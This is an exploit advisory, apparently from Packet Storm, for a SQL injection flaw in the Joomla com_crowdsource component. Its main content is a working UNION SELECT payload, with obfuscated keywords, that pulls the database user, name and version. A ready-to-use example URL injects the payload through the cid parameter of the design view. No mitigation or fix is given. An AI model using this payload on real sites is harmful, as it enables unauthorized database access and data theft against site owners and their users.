The Joomla Crowdsource component suffers from a remote SQL injection vulnerability.
bc05bc3dba9105508204c69c2ff0357d784190e165529c61db9fb0ea3e2510fb
[!] Title: Joomla Component com_crowdsource SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]########################################################################################################################################################[+]
[!] ExploiT :
-3/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--
[!] Example :
http://localhost.free/index.php?option=com_crowdsource&view=design&cid=-3/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(char(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--
[+]########################################################################################################################################################[+]
[!] Th4nks : Fantastik, MitolocyA, ISYAN,
_________________________________________________________________
Hotmail: Güçlü İSTENMEYEN POSTA koruması ile güvenilir e-posta.
https://signup.live.com/signup.aspx?id=60969
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed